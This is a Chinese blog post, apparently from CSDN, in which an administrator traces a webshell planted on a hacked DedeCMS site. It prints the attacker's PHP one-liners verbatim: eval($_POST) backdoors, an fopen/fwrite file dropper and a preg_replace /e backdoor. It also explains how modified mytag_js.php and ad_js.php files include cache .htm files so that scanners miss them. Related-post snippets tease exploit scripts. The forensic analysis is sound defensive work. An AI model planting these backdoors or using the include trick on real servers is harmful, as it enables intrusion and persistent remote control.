plusmytag_js.php,dedecms之webshell后门分析

最新推荐文章于 2021-03-23 05:15:01 发布
最新推荐文章于 2021-03-23 05:15:01 发布
阅读量512 收藏
点赞数
文章标签: plusmytag_js.php

dedecms之webshell后门分析

单位某站用的dedecms,今天被某黑阔getshell了,无奈只能打包代码进行分析,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:{dede:php}file_put_contents(’90sec.php’,'<?php  eval($_POST[guige]);?>’);{/dede:php}

但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。

最后翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:

document.write(“dedecmsisok<?php  @eval($_POST[cmd]);?>”);

–>

document.write(“<?php  $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

–>

document.write(“<?php  echo ‘dedecms 5.7 0day
guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST[‘guige’],’error’);?>”);

–>

看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟?,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:

05a65a5b2ad53ff12bd604cd6dfe0f16.png

看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写?各种类型的一句话代码,然后再修改plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话了.

http://www.nxadmin.com/plus/mytag_js.php?id=1208

http://www.nxadmin.com/plus/ad_js.php?id=1

具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.

何新彪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(织梦cms)dedecms5.7注入和上传0day
Yatere的天平秤
04-29 1万+
漏洞类型:注入漏洞、上传漏洞 漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。   注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergro
织梦plus mytag_js.php,织梦dedecms 插件plus文件调用头部尾部的方法
weixin_33470084的博客
03-27 297
织梦dedecms 插件plus文件调用头部尾部的方法织梦无忧2018-12-06 11:51摘要:织梦dedecms 插件plus文件调用头部尾部的方法 。 方法一: 进入自定义宏标记,正常显示内容里增加:{dede:include filename=head.htm/} 回到自定义标签列表,点击JS调用可以得到JS调用代码script src=/plus/mytag_js.php?aid=1 ...
plus/mytag_js.php?aid=9090,DeDeCMS(织梦)变量覆盖0day getshell
weixin_35690449的博客
03-23 592
#!usr/bin/php -w<?phperror_reporting(E_ERROR);set_time_limit(0);print_r(´DEDEcms Variable CoverageExploit Author: www.heixiaozi.com www.webvul.com);echo "\r\n";if($argv[2]==null){print_r(´+--------...
dedeCMS /plus/ad_js.php、/plus/mytag_js.php Vul Via Injecting PHP Code By /plus/download.php Into DB ...
weixin_30388677的博客
01-20 561
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 对于这个漏洞,我们可以简单概括如下 1. "/plus/download.php"文件会引入"/include/common.inc.php"文件 2. "/include/common.inc.php"中会对用户输入的变量进行"变...
plus/mytag_js.php?aid=9090,织梦模板网站留言板调用网站的head.htm,footer.htm的方法
weixin_36059283的博客
03-23 396
织梦模板网站留言板调用网站的head.htm,footer.htm的方法二,好多人都想在留言本guestbook.htm里实现dede的标签调用,问题是在plus里不支持dede标签的应用。现在有一个简单的办法可以调用标签。拿在留言本调用head.htm实例一般我们在首页调用head是用{dede:include filename="head.htm"/},这在plus里是无效的。我们可以在自定义...
Decryption-WEBSHELL.rar_asp webshell_webshell_webshell asp
09-24
坊间流传的ASP WEBSHELL几乎全部加密,而且带有后门,此版本为开源解密版.而且后门以剔除.
Shuffle::mahjong_red_dragon:WebShell后门框架
05-14
$ python shuffle.py -g webshell.php -p h4x0r Webshel​​l会在shuffle文件夹中生成。 ~ /shuffle/out/webshell.php 连接中 当您将外壳程序上载到计算机时,您需要使用以下命令运行外壳程序: $ python shuffle....
luci-app-webshell_git-18.115.08652-20caa3f-1_all.ipk
02-24
适用于openwrt系统,通过GUI操作shell的安装包,网上收集来的,我未测试,不要提什么问题。
wso.rar_wso webshell
09-24
著名的wso webshell 服务器管理程序
en.rar_jsp webshell
09-19
en.jsp 操作服务器文件命令 俗称webshell
K8 weblogic-CVE-2018-2628-getshell工具
08-14
K8 weblogic-CVE-2018-2628-getshell 渗透测试工具,内包含漏洞利用 图片、ip端口连接、shell控制。
适合个人网站备案的HTML模板
05-08
适合个人网站备案的HTML模板 适合个人网站备案的HTML模板
plusmytag_js.php,木马上传
weixin_39630735的博客
03-09 3488
攻击payload1:a=Execute++++++++++++++++++++++++++++++("++++++++++++++++++++++++++++++Execute++++++++++++++++++++++++++++++(""++++++++++:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid...
利用安全狗防护DedeCMS v5.7高危注入漏洞 [复制链接]
IT技术宅-北方的刀郎
03-21 8293
漏洞修复版本:DedeCMS v5.7 20130607之后版本http://bbs.safedog.cn/thread-52264-1-1.html       漏洞触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll。       漏洞触发根源:在于/include/dedesql.class.php文件中程序未初始化$arrs1和$arrs2这两
dedecms 最新漏洞 利用mytag_js上传文件
zdkjob专栏
08-25 7397
制作文件  然后在自己远程支持外链的mysql库中的表前缀_mytag 中插入insert into dede_mytag(aid,normbody) values(2,'{dede:php}$fp = @fopen(DEDEROOT."da
dedecms 5.7 最新 mytag_js.php的漏洞解决方法
gxtiou的专栏
02-19 6221
其实是安全检查的时候没有限制敏感变量 找到文件  /include/common.inc.php 将这行 大概在58行  if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS)/',$_k) )  改为  if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS|_GET|_PO
DEDECMS 爆严重安全漏洞 免账号密码直接进入后台
热门推荐
IT技术宅-北方的刀郎
03-21 1万+
DEDECMS 爆严重安全漏洞 免账号密码直接进入后台来源:互联网 作者:佚名 时间:08-20 23:46:44 【大 中 小】众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?
dedecms mytag_js.php,DedeCMS v5.7最新漏洞
weixin_42298927的博客
03-09 836
首先我们一起来了解下DedeCMS v5.7漏洞情况:1、漏洞描述漏洞所在版本:DedeCMS v5.7漏洞发布时间:2013年06月07日漏洞修复版本:DedeCMS v5.7 20130607之后版本漏洞触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll。漏洞触发根源:在于/include/dedesql.class.php文件中程序未初始化$a...
记录一次基于ThinkPHP网站被入侵到溯源的过程
DYBOY-程序开发&网络安全
02-18 2646
昨天晚上,正准备入睡,朋友突然发消息说他的网站被黑客攻击了,首页内容被篡改,于是我开始了紧急的修复工作 知道这个情况后,立即翻身起来,让朋友发给我必要的信息,把网站的日志下载到本地,因为网站本身的访问量不是很大,所以直接使用 notepad++ 来手动分析。 0x01 下载必要文件 首先将日志文件、现在网站空间的源码以及之前的网站备份下载到本地,这一步是为了比较分析。 0x02 日志分析 从网...
webshell后门
最新发布
07-27
Webshell后门是指一段网页代码,通常是ASP、ASP.NET、PHPJSP等语言编写的,用于在服务器端进行一些危险操作,获取敏感信息或控制服务器的控制权。攻击者通过Webshell后门可以执行各种操作,比如上传、下载、删除...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值